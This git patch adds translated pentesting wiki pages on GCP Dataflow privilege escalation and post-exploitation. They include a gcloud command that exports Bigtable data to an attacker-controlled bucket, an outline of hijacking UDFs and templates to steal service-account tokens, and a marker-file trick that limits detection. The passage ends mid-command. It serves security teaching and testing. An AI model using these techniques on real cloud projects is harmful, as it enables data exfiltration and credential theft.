From 2100c6d41cd170704bfaa6e112ee95915967f055 Mon Sep 17 00:00:00 2001 From: Translator Date: Mon, 16 Feb 2026 11:11:48 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/gcp-security/gcp-privilege-escalation/ --- .../gcp-dataflow-post-exploitation.md | 53 ++++++ .../gcp-dataflow-privesc.md | 172 ++++++++++++++++++ .../gcp-services/gcp-dataflow-enum.md | 81 +++++++++ 3 files changed, 306 insertions(+) create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md new file mode 100644 index 000000000..375572f8d --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md @@ -0,0 +1,53 @@ +# GCP - Dataflow Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Dataflow + +欲了解有关 Dataflow 的更多信息,请参阅: + +{{#ref}} +../gcp-services/gcp-dataflow-enum.md +{{#endref}} + +### 使用 Dataflow 来 exfiltrate 来自其他服务的数据 + +**权限:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`(针对拥有对源和 sink 访问权限的 SA) + +拥有 Dataflow 作业创建权限后,你可以使用 GCP Dataflow 模板将 Bigtable、BigQuery、Pub/Sub 等服务的数据导出到攻击者控制的 GCS 桶中。当你获得 Dataflow 访问权限时(例如通过 [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation(通过 bucket 写入接管 pipeline)),这是一个强大的 post-exploitation 技术。 + +> [!NOTE] +> 你需要对具有足够权限以读取源并写入 sink 的 service account (SA) 拥有 `iam.serviceAccounts.actAs`。默认情况下,如果未指定,将使用 Compute Engine 默认 SA。 + +#### Bigtable to GCS + +参见 [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) — "Dump rows to your bucket" 获取完整模式。 模板:`Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`. + +
+ +将 Bigtable 导出到攻击者控制的 bucket +```bash +gcloud dataflow jobs run \ +--gcs-location=gs://dataflow-templates-us-//Cloud_Bigtable_to_GCS_Json \ +--project= \ +--region= \ +--parameters=bigtableProjectId=,bigtableInstanceId=,bigtableTableId=,filenamePrefix=,outputDirectory=gs:///raw-json/ \ +--staging-location=gs:///staging/ +``` +
+ +#### BigQuery 到 GCS + +Dataflow templates exist to export BigQuery data. 使用适合目标格式(JSON、Avro 等)的模板,并将输出指向你的存储桶。 + +#### Pub/Sub 和流式来源 + +流式管道可以从 Pub/Sub(或其他来源)读取并写入到 GCS。使用一个从目标 Pub/Sub 订阅读取并写入到你控制的存储桶的模板来启动作业。 + +## 参考 + +- [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates) +- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions) +- [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md new file mode 100644 index 000000000..2ed42acad --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md @@ -0,0 +1,172 @@ +# GCP - Dataflow Privilege Escalation + +{{#include ../../../banners/hacktricks-training.md}} + +## Dataflow + +{{#ref}} +../gcp-services/gcp-dataflow-enum.md +{{#endref}} + +### `storage.objects.create`, `storage.objects.get`, `storage.objects.update` + +Dataflow 不验证存储在 GCS 中的 UDFs 和 job template YAML 的完整性。 +如果拥有 bucket 的写权限,你可以覆盖这些文件以注入代码、在 worker 上执行代码、窃取 service account tokens,或更改数据处理流程。批处理和流式 pipeline 作业都是此攻击的可行目标。要在 pipeline 上执行此攻击,需要在作业运行之前、运行开始的前几分钟(在作业 workers 被创建之前),或在作业运行期间在新 workers 因 autoscaling 启动之前替换 UDFs/templates。 + +**Attack vectors:** +- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets +- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets + + +> [!WARNING] +> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**。如果不做协调,exfiltration 或 token 窃取会被执行成千上万次,造成噪音、速率限制和检测。使用 **file-based coordination** 模式:在开始时检查标记文件(例如 `/tmp/pwnd.txt`)是否存在;如果存在则跳过恶意代码;如果不存在则运行 payload 并创建该文件。这样可以确保 payload **每个 worker 运行一次**,而不是每行运行一次。 + + +#### Direct exploitation via gcloud CLI + +1. Enumerate Dataflow jobs and locate the template/UDF GCS paths: + +
+ +List jobs and describe to get template path, staging location, and UDF references +```bash +# List jobs (optionally filter by region) +gcloud dataflow jobs list --region= +gcloud dataflow jobs list --project= + +# Describe a job to get template GCS path, staging location, and any UDF/template references +gcloud dataflow jobs describe --region= --full --format="yaml" +# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH) +# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath +``` +
+ +2. 从 GCS 下载原始 UDF 或作业模板: + +
+ +从存储桶下载 UDF 文件或 YAML 模板 +```bash +# If job references a UDF at gs://bucket/path/to/udf.py +gcloud storage cp gs:////.py ./udf_original.py + +# Or for a YAML job template +gcloud storage cp gs:////